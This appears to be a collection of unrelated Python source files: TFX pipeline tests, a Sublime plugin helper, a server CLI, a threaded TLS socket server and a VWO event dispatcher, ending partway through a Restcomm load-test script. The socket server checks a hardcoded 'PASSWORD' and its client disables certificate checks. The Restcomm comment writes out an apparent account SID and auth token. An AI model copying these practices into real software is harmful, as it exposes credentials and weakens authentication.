execution = pipeline_state1.execution execution.last_known_state = metadata_store_pb2.Execution.COMPLETE m.store.put_executions([execution]) pipeline_state3 = pipeline_ops.initiate_pipeline_start(m, pipeline1) self.assertEqual(metadata_store_pb2.Execution.NEW, pipeline_state3.execution.last_known_state) def test_initiate_pipeline_stop(self): with self._mlmd_connection as m: pipeline1 = _test_pipeline('pipeline1') pipeline_ops.initiate_pipeline_start(m, pipeline1) pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline1) pipeline_state = pipeline_ops._initiate_pipeline_stop(m, pipeline_uid) self.assertTrue(pipeline_state.is_stop_initiated()) def test_stop_pipeline_non_existent_or_inactive(self): with self._mlmd_connection as m: # Stop pipeline without creating one. with self.assertRaises(status_lib.StatusNotOkError) as exception_context: pipeline_ops.stop_pipeline( m, task_lib.PipelineUid(pipeline_id='foo', pipeline_run_id=None)) self.assertEqual(status_lib.Code.NOT_FOUND, exception_context.exception.code) # Initiate pipeline start and mark it completed. pipeline1 = _test_pipeline('pipeline1') execution = pipeline_ops.initiate_pipeline_start(m, pipeline1).execution pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline1) pipeline_ops._initiate_pipeline_stop(m, pipeline_uid) execution.last_known_state = metadata_store_pb2.Execution.COMPLETE m.store.put_executions([execution]) # Try to initiate stop again. with self.assertRaises(status_lib.StatusNotOkError) as exception_context: pipeline_ops.stop_pipeline(m, pipeline_uid) self.assertEqual(status_lib.Code.NOT_FOUND, exception_context.exception.code) def test_stop_pipeline_wait_for_inactivation(self): with self._mlmd_connection as m: pipeline1 = _test_pipeline('pipeline1') execution = pipeline_ops.initiate_pipeline_start(m, pipeline1).execution def _inactivate(execution): time.sleep(2.0) with pipeline_ops._PIPELINE_OPS_LOCK: execution.last_known_state = metadata_store_pb2.Execution.COMPLETE m.store.put_executions([execution]) thread = threading.Thread( target=_inactivate, args=(copy.deepcopy(execution),)) thread.start() pipeline_ops.stop_pipeline( m, task_lib.PipelineUid.from_pipeline(pipeline1), timeout_secs=5.0) thread.join() def test_stop_pipeline_wait_for_inactivation_timeout(self): with self._mlmd_connection as m: pipeline1 = _test_pipeline('pipeline1') pipeline_ops.initiate_pipeline_start(m, pipeline1) with self.assertRaisesRegex( status_lib.StatusNotOkError, 'Timed out.*waiting for execution inactivation.' ) as exception_context: pipeline_ops.stop_pipeline( m, task_lib.PipelineUid.from_pipeline(pipeline1), timeout_secs=1.0) self.assertEqual(status_lib.Code.DEADLINE_EXCEEDED, exception_context.exception.code) @mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator') @mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator') def test_generate_tasks_async_active_pipelines(self, mock_async_task_gen, mock_sync_task_gen): with self._mlmd_connection as m: # One active pipeline. pipeline1 = _test_pipeline('pipeline1') pipeline_ops.initiate_pipeline_start(m, pipeline1) # Another active pipeline (with previously completed execution). pipeline2 = _test_pipeline('pipeline2') execution2 = pipeline_ops.initiate_pipeline_start(m, pipeline2).execution execution2.last_known_state = metadata_store_pb2.Execution.COMPLETE m.store.put_executions([execution2]) execution2 = pipeline_ops.initiate_pipeline_start(m, pipeline2).execution # Inactive pipelines should be ignored. 
pipeline3 = _test_pipeline('pipeline3') execution3 = pipeline_ops.initiate_pipeline_start(m, pipeline3).execution execution3.last_known_state = metadata_store_pb2.Execution.COMPLETE m.store.put_executions([execution3]) # For active pipelines pipeline1 and pipeline2, there are a couple of # active executions. def _exec_node_tasks(): for pipeline_id in ('pipeline1', 'pipeline2'): yield [ test_utils.create_exec_node_task( node_uid=task_lib.NodeUid( pipeline_uid=task_lib.PipelineUid( pipeline_id=pipeline_id, pipeline_run_id=None), node_id='Transform')), test_utils.create_exec_node_task( node_uid=task_lib.NodeUid( pipeline_uid=task_lib.PipelineUid( pipeline_id=pipeline_id, pipeline_run_id=None), node_id='Trainer')) ] mock_async_task_gen.return_value.generate.side_effect = _exec_node_tasks() task_queue = tq.TaskQueue() pipeline_ops.generate_tasks(m, task_queue) self.assertEqual(2, mock_async_task_gen.return_value.generate.call_count) mock_sync_task_gen.assert_not_called() # Verify that tasks are enqueued in the expected order. for node_id in ('Transform', 'Trainer'): task = task_queue.dequeue() task_queue.task_done(task) self.assertTrue(task_lib.is_exec_node_task(task)) self.assertEqual(node_id, task.node_uid.node_id) self.assertEqual('pipeline1', task.node_uid.pipeline_uid.pipeline_id) for node_id in ('Transform', 'Trainer'): task = task_queue.dequeue() task_queue.task_done(task) self.assertTrue(task_lib.is_exec_node_task(task)) self.assertEqual(node_id, task.node_uid.node_id) self.assertEqual('pipeline2', task.node_uid.pipeline_uid.pipeline_id) self.assertTrue(task_queue.is_empty()) @mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator') @mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator') @mock.patch.object(task_gen_utils, 'generate_task_from_active_execution') def test_stop_initiated_async_pipelines(self, mock_gen_task_from_active, mock_async_task_gen, mock_sync_task_gen): with self._mlmd_connection as m: pipeline1 = _test_pipeline('pipeline1') pipeline1.nodes.add().pipeline_node.node_info.id = 'Transform' pipeline1.nodes.add().pipeline_node.node_info.id = 'Trainer' pipeline1.nodes.add().pipeline_node.node_info.id = 'Evaluator' pipeline_ops.initiate_pipeline_start(m, pipeline1) pipeline1_execution = pipeline_ops._initiate_pipeline_stop( m, task_lib.PipelineUid.from_pipeline(pipeline1)).execution task_queue = tq.TaskQueue() # For the stop-initiated pipeline, "Transform" execution task is in queue, # "Trainer" has an active execution in MLMD but no task in queue, # "Evaluator" has no active execution. task_queue.enqueue( test_utils.create_exec_node_task( node_uid=task_lib.NodeUid( pipeline_uid=task_lib.PipelineUid( pipeline_id='pipeline1', pipeline_run_id=None), node_id='Transform'))) transform_task = task_queue.dequeue() # simulates task being processed mock_gen_task_from_active.side_effect = [ test_utils.create_exec_node_task( node_uid=task_lib.NodeUid( pipeline_uid=task_lib.PipelineUid( pipeline_id='pipeline1', pipeline_run_id=None), node_id='Trainer'), is_cancelled=True), None, None, None, None ] pipeline_ops.generate_tasks(m, task_queue) # There are no active pipelines so these shouldn't be called. mock_async_task_gen.assert_not_called() mock_sync_task_gen.assert_not_called() # Simulate finishing the "Transform" ExecNodeTask. task_queue.task_done(transform_task) # CancelNodeTask for the "Transform" ExecNodeTask should be next. 
task = task_queue.dequeue() task_queue.task_done(task) self.assertTrue(task_lib.is_cancel_node_task(task)) self.assertEqual('Transform', task.node_uid.node_id) # ExecNodeTask for "Trainer" is next. task = task_queue.dequeue() task_queue.task_done(task) self.assertTrue(task_lib.is_exec_node_task(task)) self.assertEqual('Trainer', task.node_uid.node_id) self.assertTrue(task_queue.is_empty()) mock_gen_task_from_active.assert_has_calls([ mock.call( m, pipeline1, pipeline1.nodes[1].pipeline_node, mock.ANY, is_cancelled=True), mock.call( m, pipeline1, pipeline1.nodes[2].pipeline_node, mock.ANY, is_cancelled=True) ]) self.assertEqual(2, mock_gen_task_from_active.call_count) # Pipeline execution should continue to be active since active node # executions were found in the last call to `generate_tasks`. [execution] = m.store.get_executions_by_id([pipeline1_execution.id]) self.assertTrue(execution_lib.is_execution_active(execution)) # Call `generate_tasks` again; this time there are no more active node # executions so the pipeline should be marked as cancelled. pipeline_ops.generate_tasks(m, task_queue) self.assertTrue(task_queue.is_empty()) [execution] = m.store.get_executions_by_id([pipeline1_execution.id]) self.assertEqual(metadata_store_pb2.Execution.CANCELED, execution.last_known_state) def test_to_status_not_ok_error_decorator(self): @pipeline_ops._to_status_not_ok_error def fn1(): raise RuntimeError('test error 1') @pipeline_ops._to_status_not_ok_error def fn2(): raise status_lib.StatusNotOkError( code=status_lib.Code.ALREADY_EXISTS, message='test error 2') with self.assertRaisesRegex(status_lib.StatusNotOkError, 'test error 1') as ctxt: fn1() self.assertEqual(status_lib.Code.UNKNOWN, ctxt.exception.code) with self.assertRaisesRegex(status_lib.StatusNotOkError, 'test error 2') as ctxt: fn2() self.assertEqual(status_lib.Code.ALREADY_EXISTS, ctxt.exception.code) if __name__ == '__main__': tf.test.main()
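# ------------------------------------------------------------------------------
# Illustrative sketch (not the real tfx implementation): the behaviour that
# test_to_status_not_ok_error_decorator above exercises -- StatusNotOkError
# passes through unchanged while any other exception is re-raised as
# StatusNotOkError with code UNKNOWN -- can be written roughly as below.  Only
# the constructor and attributes already used in this test file are assumed.
# ------------------------------------------------------------------------------
def _to_status_not_ok_error_sketch(fn):
  import functools

  @functools.wraps(fn)
  def wrapper(*args, **kwargs):
    try:
      return fn(*args, **kwargs)
    except status_lib.StatusNotOkError:
      raise
    except Exception as e:  # pylint: disable=broad-except
      raise status_lib.StatusNotOkError(
          code=status_lib.Code.UNKNOWN, message=str(e))

  return wrapper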
utils.py
import sublime import os import sys import platform import subprocess import threading import socket import traceback import fnmatch DEBUG = True DEBUG = False PACKAGE_PATH = os.path.dirname(os.path.realpath(__file__)) RUN_PATH = os.path.join(PACKAGE_PATH, 'backend_run.js') if DEBUG: RUN_PATH = os.path.join(PACKAGE_PATH, 'backend', 'run.js') NODE_BIN = 'node' def initialize(): global NODE_BIN if NODE_BIN == 'node' or not bool(NODE_BIN): NODE_BIN = get_setting('node_bin', '') if not bool(NODE_BIN): NODE_BIN = find_executable('node') if not bool(NODE_BIN): NODE_BIN = 'node' def debug(s, data=None, force=False): if (DEBUG or force): message = str(s) if (data is not None): message = message + ': ' + str(data) print(message) def run_command(command, data=None, callback=None): global NODE_BIN debug('Run command', [NODE_BIN, command, data]) json = sublime.encode_value(data) err = None out = None try: (err, out) = exec([NODE_BIN, RUN_PATH, command, json]) except Exception as e: err = traceback.format_exc() if bool(err): if callback is not None: return callback(err, None) raise err debug('Trying to decode', out) result = sublime.decode_value(out) if callback is not None: return callback(None, result) return result def run_command_async(command, data=None, callback=None): thread = threading.Thread(target=run_command, args=(command, data, callback)) thread.start() def exec(cmd): if os.name == 'nt': si = subprocess.STARTUPINFO() si.dwFlags |= subprocess.SW_HIDE | subprocess.STARTF_USESHOWWINDOW proc = subprocess.Popen(cmd, cwd=PACKAGE_PATH, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=si) else: proc = subprocess.Popen(cmd, cwd=PACKAGE_PATH, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) outs, errs = proc.communicate() err = errs.decode().strip() if bool(err): debug('Exec error', err, True) return (err, outs.decode().strip()) def exec_async(cmd, done=None): def run_thread(cmd, done): (err, result) = exec(cmd) if (done is not None): done(err, result) return thread = threading.Thread(target=run_thread, args=(cmd, done)) thread.start() return thread def unixify(path): path = path.replace('\\', '/') ext3 = path[-3:] if (ext3 == '.ts' or ext3 == '.js'): return path[0:-3] ext4 = path[-4:] if (ext4 == '.tsx' or ext4 == '.jsx'): return path[0:-4] return path def get_panel_item(root, item): # Prepare string to show in window's quick panel. module = item.get('module') name = item.get('name') # TODO: Handle case when name is none (browserify) if name is None: return None if (module is not None): return module + '/' + name filepath = os.path.normpath(item['filepath'])[len(root) + 1:] return unixify(filepath) + '/' + name def norm_path(base, to): return os.path.normpath(os.path.join(os.path.dirname(base), to)) def on_done_func(choices, func): # Return a function which is used with sublime list picking. 
def on_done(index): if index >= 0: return func(choices[index]) return on_done def is_excluded_file(filepath, exclude_patterns): if exclude_patterns is None or len(exclude_patterns) == 0: return False for pattern in exclude_patterns: if fnmatch.fnmatch(filepath, pattern): return True if not os.path.isabs(pattern): if fnmatch.fnmatch(filepath, os.path.normpath('*/' + pattern + '/*')): return True if fnmatch.fnmatch(filepath, os.path.normpath('*/' + pattern)): return True if fnmatch.fnmatch(filepath, os.path.normpath(pattern + '/*')): return True return False def get_setting(name, default): result = None project_data = sublime.active_window().project_data() if project_data is not None: result = project_data.get(name) if result is None: settings = sublime.load_settings('import_helper.sublime-settings') or {} result = settings.get(name) if result is None: preferences = sublime.load_settings('Preferences.sublime-settings') result = preferences.get(name) if result is None: result = default return result def get_import_root(): window = sublime.active_window() project_file = window.project_file_name() if project_file is None: return None project_data = window.project_data() or {} result = project_data.get('import_root') if result is None: result = project_data['folders'][0]['path'] return norm_path(project_file, result) # https://gist.github.com/4368898 # Public domain code by anatoly techtonik <techtonik@gmail.com> # AKA Linux `which` and Windows `where` def find_executable(executable, path = None): """Find if 'executable' can be run. Looks for it in 'path' (string that lists directories separated by 'os.pathsep'; defaults to os.environ['PATH']). Checks for all executable extensions. Returns full path or None if no command is found. """ if path is None: path = os.environ['PATH'] paths = path.split(os.pathsep) extlist = [''] if os.name == 'os2': (base, ext) = os.path.splitext(executable) # executable files on OS/2 can have an arbitrary extension, but # .exe is automatically appended if no dot is present in the name if not ext: executable = executable + '.exe' elif sys.platform == 'win32': pathext = os.environ['PATHEXT'].lower().split(os.pathsep) (base, ext) = os.path.splitext(executable) if ext.lower() not in pathext: extlist = pathext for ext in extlist: execname = executable + ext if os.path.isfile(execname): return execname else: for p in paths: f = os.path.join(p, execname) if os.path.isfile(f): return f else: return None def get_exclude_patterns(): result = [] project_data = sublime.active_window().project_data() project_file = sublime.active_window().project_file_name() for folder in project_data['folders']: folder_exclude_patterns = folder.get('folder_exclude_patterns') if folder_exclude_patterns is None: folder_exclude_patterns = [] for pattern in folder_exclude_patterns: result.append(pattern) file_exclude_patterns = folder.get('file_exclude_patterns') if file_exclude_patterns is None: file_exclude_patterns = [] for pattern in file_exclude_patterns: result.append(pattern) return result
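# ---------------------------------------------------------------------------
# Illustrative sketch (not called by the plugin): how is_excluded_file() above
# matches the folder/file exclude patterns.  The paths and patterns are
# invented examples and assume POSIX-style path separators.
# ---------------------------------------------------------------------------
def _demo_is_excluded_file():
    # A bare folder name matches anywhere in the path ('*/node_modules/*').
    assert is_excluded_file('/work/app/node_modules/lib/index.js', ['node_modules'])
    assert not is_excluded_file('/work/app/src/index.js', ['node_modules'])
    # A glob pattern is also tried directly against the full path.
    assert is_excluded_file('/work/app/src/index.spec.js', ['*.spec.js'])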
cli.py
import logging import os import threading import webbrowser from typing import Any, Dict, List import toml import typer import uvicorn from fps_uvicorn.config import UvicornConfig from fps.config import Config from fps.logging import configure_loggers, get_loggers_config from fps.utils import merge_dicts app = typer.Typer() def parse_extra_options(options: List[str]) -> Dict[str, Any]: def unnested_option(key: str, val: str, root: bool = True) -> Dict[str, Any]: if "." in key: k1, k2 = key.split(".", maxsplit=1) if not k1 or not k2: raise ValueError(f"Ill-formed option key '{key}'") try: return {k1: unnested_option(k2, val, False)} except ValueError as e: if root: raise ValueError(f"Ill-formed option key '{key}'") else: raise e else: if root: raise AttributeError( f"Plugin option must be of the form '<plugin-name>.<option>', got '{key}'" ) if "," in val: if val.startswith("[") and val.endswith("]"): return {key: [v for v in val[1:-1].split(",")]} else: return {key: [v for v in val.split(",")]} else: return {key: val} formatted_options: Dict[str, Any] = {} i = 0 while i < len(options): opt = options[i] # ill-formed extra config if not opt.startswith("--"): typer.echo(f"Optional config should start with '--', got '{opt}'") raise typer.Abort() if "=" in opt: # option is --key=value k, v = opt[2:].split("=", maxsplit=1) merge_dicts(formatted_options, unnested_option(k, v)) else: if i + 1 < len(options): # option if a flag --key if options[i + 1].startswith("--"): merge_dicts(formatted_options, unnested_option(opt[2:], "true")) # option is --key value else: merge_dicts( formatted_options, unnested_option(opt[2:], options[i + 1]) ) i += 1 # option if a flag --key else: merge_dicts(formatted_options, unnested_option(opt[2:], "true")) i += 1 return formatted_options def store_extra_options(options: Dict[str, Any]): if options: opts = parse_extra_options(options) f_name = "fps_cli_args.toml" with open(f_name, "w") as f: toml.dump(opts, f) os.environ["FPS_CLI_CONFIG_FILE"] = f_name @app.command( context_settings={"allow_extra_args": True, "ignore_unknown_options": True} ) def start( ctx: typer.Context, host: str = None, port: int = None, root_path: str = None, reload: bool = typer.Option( None, help=( "Enable/disable automatic reloading of the server when sources are modified" ), ), reload_dirs: str = ".", open_browser: bool = typer.Option( None, help=("Enable/disable automatic automatic opening of the browser"), ), config: str = None, workers: int = None, ): logger = logging.getLogger("fps") if config: if os.path.isfile(config): os.environ["FPS_EXTRA_CONFIG_FILE"] = config else: logger.error(f"Invalid configuration file '{config}'") exit(1) store_extra_options(ctx.args) Config.register("uvicorn", UvicornConfig) config = Config(UvicornConfig) host = host or config.host port = port or config.port root_path = root_path or config.root_path reload = reload if reload is not None else config.reload open_browser = open_browser if open_browser is not None else config.open_browser workers = workers or config.workers if open_browser: threading.Thread(target=launch_browser, args=(host, port), daemon=True).start() configure_loggers(("uvicorn", "uvicorn.access", "uvicorn.error")) uvicorn.run( "fps.main:app", host=host, port=port, root_path=root_path, workers=workers, log_config=get_loggers_config(), reload=reload, reload_dirs=reload_dirs, ) def launch_browser(host: str, port: int): webbrowser.open_new(f"{host}:{port}")
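# ---------------------------------------------------------------------------
# Illustrative sketch (not called by the CLI): what parse_extra_options() does
# with the extra "--<plugin>.<option>" arguments that typer passes through in
# ctx.args.  The plugin and option names below are invented examples.
# ---------------------------------------------------------------------------
def _demo_parse_extra_options() -> Dict[str, Any]:
    options = [
        "--jupyter.port=8888",                 # --key=value form
        "--jupyter.open_browser",              # flag form, stored as "true"
        "--kernels.names=[python3,xpython]",   # bracketed list form
        "--auth.mode", "token",                # --key value form
    ]
    # Returns:
    # {
    #     "jupyter": {"port": "8888", "open_browser": "true"},
    #     "kernels": {"names": ["python3", "xpython"]},
    #     "auth": {"mode": "token"},
    # }
    return parse_extra_options(options)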
thread_names.py
from threading import Thread, current_thread
import time

import prctl


def sleeper():
    # Expose the Python thread name to the OS (e.g. visible in top/ps output).
    prctl.prctl(prctl.NAME, current_thread().name)
    while True:
        time.sleep(10)
        print("sleeping")


threads = [Thread(target=sleeper, name="Sleeper01"),
           Thread(target=sleeper, name="Sleeper02"),
           Thread(target=sleeper, name="something else")]

for t in threads:
    t.start()
for t in threads:
    t.join()
server_socket.py
# -*- coding: utf-8 -*-
import socket
import ssl
import threading
import atexit


class Cli:
    count = 0

    def __init__(self, con_s, addr):
        Cli.count += 1
        print("New connection:", addr[0], addr[1], "In total", Cli.count, "connections")
        self.con_s = con_s
        self.addr = addr
        self.topics = ""
        self.auth = False

    def recv(self, byt=1024):
        return self.con_s.recv(byt).decode()

    def exit(self):
        self.con_s.close()
        Cli.count -= 1
        print(self.addr[0], self.addr[1], "disconnected")

    def send(self, data):
        print(self.addr[1], "Send", data)
        self.con_s.send(data.encode())

    def subs(self, data):
        print(self.addr[1], "Subs", data)
        self.topics += data

    def unsubs(self, data):
        # str.replace returns a new string, so the result must be assigned back.
        self.topics = self.topics.replace(data, '')
        print(self.addr[1], 'Unsubs', data)


def on_new_client(cs, addr):
    global clientList
    cl = Cli(cs, addr)
    clientList.append(cl)
    while True:
        data = cl.recv()
        if len(data) < 1:
            pass
        elif cl.auth:
            if data == "q":
                cl.exit()
                clientList.remove(cl)
                return
            elif data[0] == "t":
                cl.subs(data[1:])
            elif data[0] == "s":
                # Compare string values with ==, not identity with "is".
                zus = "\n" if data[1] == "u" else ""
                for i in clientList:
                    if data[1] in i.topics:
                        i.send('s' + data[2:] + zus)
            elif data[0] == "d":
                cl.unsubs(data[1:])
            elif data[0] == "c":
                cl.send('c' + str(Cli.count))
            else:
                print(str(data))
        elif data[0] == "a":
            if data[1:] == "PASSWORD":
                cl.auth = True
                print(addr[1], "authenticated")
            else:
                print(addr[1], "not authenticated")
                cl.exit()
                clientList.remove(cl)
                return


def exit_handler():
    global s, ssock
    for cl in clientList:
        cl.exit()
    s.close()
    ssock.close()
    print("Socket closed")

atexit.register(exit_handler)  # Register an exit handler for unsuspected exits like KeyboardInterrupt

context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.load_cert_chain(certfile='ssl/cert.pem', keyfile='ssl/pv.key')

PORT = 4444
MAXCON = 2  # Max connections

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print('Socket created')

s.bind((socket.gethostname(), PORT))
print('Socket connected')
s.listen(5)
ssock = context.wrap_socket(s, server_side=True)

run = True
clientList = []

while run:
    # accept connections from outside
    if Cli.count <= MAXCON:
        conn, address = ssock.accept()
        threading.Thread(target=on_new_client, args=(conn, address)).start()

s.close()
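# ---------------------------------------------------------------------------
# Client sketch (not part of the server above): connect over TLS, authenticate,
# subscribe and publish one message using only the standard library.
# Certificate verification is disabled because the server uses a self-signed
# certificate.  Host, port, the "x" topic and the pauses are example choices;
# the pauses matter because the server reads the raw TCP stream without any
# message framing, so back-to-back sends can arrive concatenated.
# ---------------------------------------------------------------------------
def example_client(host=socket.gethostname(), port=PORT):
    import time

    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE

    conn = ctx.wrap_socket(socket.create_connection((host, port)),
                           server_hostname=host)

    conn.send("aPASSWORD".encode())  # authenticate (placeholder password above)
    time.sleep(0.1)
    conn.send("tx".encode())         # subscribe to topic "x"
    time.sleep(0.1)
    conn.send("sxhello".encode())    # publish "hello" to topic "x"
    print(conn.recv(1024).decode())  # our own message comes back as "shello"
    conn.send("q".encode())          # disconnect cleanly
    conn.close()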
event_dispatcher.py
# Copyright 2019-2021 Wingify Software Pvt. Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import threading from ..http.connection import Connection from ..services.usage_stats_manager import UsageStats from ..enums.log_message_enum import LogMessageEnum from ..enums.file_name_enum import FileNameEnum from ..enums.log_level_enum import LogLevelEnum from ..logger import VWOLogger from ..constants import constants FILE = FileNameEnum.Event.EventDispatcher class EventDispatcher(object): """ Class having request making/event dispatching capabilities to our servers""" def __init__(self, is_development_mode=False, batch_event_settings=None, sdk_key=None): """Initialize the dispatcher with logger Args: is_development_mode: To specify whether the request to our server should be made or not. """ self.logger = VWOLogger.getInstance() self.is_development_mode = is_development_mode self.connection = Connection() self.sdk_key = sdk_key self.sdk_v = constants.SDK_VERSION self.sdk = constants.SDK_NAME self.account_id = None self.queue = None self.queue_metadata = {} self.timer = None self.event_batching = False self.events_per_request = constants.BATCH_EVENTS.DEFAULT_EVENTS_PER_REQUEST self.request_time_interval = constants.BATCH_EVENTS.DEFAULT_REQUEST_TIME_INTERVAL self.flush_callback = None if batch_event_settings: self.event_batching = True self.queue = [] if batch_event_settings.get(constants.BATCH_EVENTS.EVENTS_PER_REQUEST): self.events_per_request = batch_event_settings.get(constants.BATCH_EVENTS.EVENTS_PER_REQUEST) if batch_event_settings.get(constants.BATCH_EVENTS.REQUEST_TIME_INTERVAL): self.request_time_interval = batch_event_settings.get(constants.BATCH_EVENTS.REQUEST_TIME_INTERVAL) if batch_event_settings.get(constants.BATCH_EVENTS.FLUSH_CALLBACK): self.flush_callback = batch_event_settings.get(constants.BATCH_EVENTS.FLUSH_CALLBACK) def dispatch(self, impression): """This method checks for development mode, if it is False then it sends the impression to our servers using a vwo.http.connection.Connection object, else return True without sending the impression. 
Args: impression (dict): Dictionary object containing the information of the impression Returns: bool: True if impression is successfully received by our servers, else false """ url = impression.pop("url") if self.is_development_mode: result = True else: result = False if self.event_batching is False: # sync API call resp = self.connection.get(url, params=impression) result = resp.get("status_code") == 200 else: result = self.async_dispatch(url, impression) if result is True: if self.event_batching is True: self.logger.log( LogLevelEnum.INFO, LogMessageEnum.INFO_MESSAGES.IMPRESSION_SUCCESS_QUEUE.format( file=FILE, end_point=url, queue_length=len(self.queue), queue_metadata=self.queue_metadata ), ) else: self.logger.log( LogLevelEnum.INFO, LogMessageEnum.INFO_MESSAGES.IMPRESSION_SUCCESS.format(file=FILE, end_point=url) ) return True else: if self.event_batching is True: self.logger.log( LogLevelEnum.ERROR, LogMessageEnum.ERROR_MESSAGES.IMPRESSION_FAILED_QUEUE.format(file=FILE, end_point=url), ) else: self.logger.log( LogLevelEnum.ERROR, LogMessageEnum.ERROR_MESSAGES.IMPRESSION_FAILED.format(file=FILE, end_point=url) ) return False def async_dispatch(self, url, impression): """ This method pushes impression in queue after modifying the payload Args: url (string): VWO's url for syncing an impression impression (dict): Dictionary object containing the information of the impression Returns: bool: True if impression is successfully pushed in queue, else false """ try: # build payload payload = self.build_event_payload(url, impression) # push in queue self.queue.append(payload) self.update_queue_metadata(url=url) # flush queue periodically if len(self.queue) == 1: self.timer = threading.Timer(self.request_time_interval, self.flush_queue) self.timer.start() # flush queue when full if len(self.queue) >= self.events_per_request: self.flush_queue() return True except Exception: self.logger.log( LogLevelEnum.ERROR, LogMessageEnum.ERROR_MESSAGES.IMPRESSION_FAILED.format( file=FILE, end_point=url, ), ) return False def build_event_payload(self, url, impression): """ This method builds payload from url and impression. 
It can then be used in bulk api for an event Args: url (string): VWO's url for syncing an impression impression (dict): Dictionary object containing the information of the impression Returns: payload (dict): Dictionary object containing the information computed from url and impression """ if self.account_id is None: self.account_id = impression.get("account_id") url_split = url.split("/") event_name = url_split[-1] payload = { "u": impression.get("u"), "sId": impression.get("sId"), } if event_name == constants.EVENTS.TRACK_USER: payload.update({"c": impression.get("combination"), "e": impression.get("experiment_id"), "eT": 1}) elif event_name == constants.EVENTS.TRACK_GOAL: payload.update( { "c": impression.get("combination"), "e": impression.get("experiment_id"), "g": impression.get("goal_id"), "eT": 2, } ) if impression.get("r") is not None: payload.update(r=impression.get("r")) elif event_name == constants.EVENTS.PUSH: payload.update({"t": impression.get("tags"), "eT": 3}) return payload def spawn_thread_to_sync(self, events): """ Spawns a thread to sync events to VWO servers Args: events (list): List of events to be synced to VWO servers """ sync_thread = threading.Thread(target=self.sync_with_vwo, args=(events,)) sync_thread.start() def sync_with_vwo(self, events): url = constants.HTTPS_PROTOCOL + constants.ENDPOINTS.BASE_URL url = url + constants.ENDPOINTS.BATCH_EVENTS queue_length = len(events) try: query_params = {"a": self.account_id, "sdk": self.sdk, "sdk-v": self.sdk_v, "env": self.sdk_key} post_data = {"ev": events} query_params.update(UsageStats.get_usage_stats()) headers = {"Authorization": self.sdk_key} resp = self.connection.post(url, params=query_params, data=post_data, headers=headers) status_code = resp.get("status_code") if status_code == 200: self.logger.log( LogLevelEnum.INFO, LogMessageEnum.INFO_MESSAGES.IMPRESSION_SUCCESS.format( file=FILE, end_point=url, account_id=self.account_id, ), ) elif status_code == 413: self.logger.log( LogLevelEnum.ERROR, LogMessageEnum.ERROR_MESSAGES.BATCH_EVENT_LIMIT_EXCEEDED.format( file=FILE, end_point=url, events_per_request=queue_length, account_id=self.account_id, ), ) else: self.logger.log( LogLevelEnum.ERROR, LogMessageEnum.ERROR_MESSAGES.BULK_NOT_PROCESSED.format( file=FILE, ), ) if self.flush_callback: self.flush_callback(None, events) except Exception as err: self.logger.log( LogLevelEnum.ERROR, LogMessageEnum.ERROR_MESSAGES.BULK_NOT_PROCESSED.format( file=FILE, ), ) if self.flush_callback: self.flush_callback(err, events) def flush_queue(self, manual=False, mode="async"): """ Flush_queue Args: manual(bool): Informs if the function was triggered manually by user or not mode(string): In sync mode, function makes a synchronous call before exiting In async mode, function spawns a thread to sync to VWO and exits """ if self.event_batching is False: return events = self.queue no_of_events = len(events) queue_metadata = self.queue_metadata if no_of_events < 1: return self.logger.log( LogLevelEnum.DEBUG, LogMessageEnum.DEBUG_MESSAGES.BEFORE_FLUSHING.format( file=FILE, manually="manually" if manual else "", length=no_of_events, timer="Timer will be cleared and registered again" if manual else "", queue_metadata=queue_metadata, ), ) # stop timer if self.timer: self.timer.cancel() # flush queue self.queue = [] self.queue_metadata = {} self.logger.log( LogLevelEnum.INFO, LogMessageEnum.INFO_MESSAGES.AFTER_FLUSHING.format( file=FILE, length=no_of_events, manually="manually" if manual else "", queue_metadata=queue_metadata ), ) if mode == 
"async": self.spawn_thread_to_sync(events=events) else: self.sync_with_vwo(events=events) def update_queue_metadata(self, url): url_split = url.split("/") event_name = url_split[-1] if self.queue_metadata.get(event_name) is None: self.queue_metadata[event_name] = 0 self.queue_metadata[event_name] += 1
restcomm-test.py
#! /usr/bin/env python # Load testing Restcomm Media Server # # Example invocations: # - Secure invocation: # $ ./restcomm-test.py --client-count 50 --client-url https://192.168.2.3:10510/webrtc-client.html --client-register-ws-url wss://192.168.2.3:5083 --client-register-domain 192.168.2.3 --client-username-prefix user --client-password 1234 --restcomm-account-sid ACae6e420f425248d6a26948c17a9e2acf --restcomm-auth-token 0d01c95aac798602579fe08fc2461036 --restcomm-base-url https://192.168.2.3:8443 --restcomm-phone-number "+5556" --restcomm-external-service-url http://192.168.2.3:10512/rcml --client-browser "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --client-web-app-dir ../webrtc-load-tests/ --client-respawn-url https://192.168.2.3:10511/respawn-user # # TODOs: # # - Enhance this so that it also works in Linux machines. Currently it has been tested only in OSX. Some changes needed: # * Browser executables reside in different places # - Fix the unprovisioning functionality also remove the Restcomm Clients and Restcomm Number # - Make accountSid and authToken not required since we have introduced the --test-modes where we can configure if we want provisioning to take place or not # import argparse import sys import json import time import ssl import subprocess import os import re import urllib import urlparse import signal import datetime from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer from socket import * from threading import Thread # Notice that we are using the dummy module which is implemented with threads, # not multiple processes, as processes might be overkill in our situation (in # case for example we want to spawn hundredths) # # To use multiple processes instead we should use: # import multiprocessing # And replace ThreadPool with Pool from multiprocessing.dummy import Pool as ThreadPool # Selenium imports from selenium import webdriver from selenium.webdriver.common.keys import Keys from selenium.webdriver.chrome.options import Options from selenium.webdriver.common.desired_capabilities import 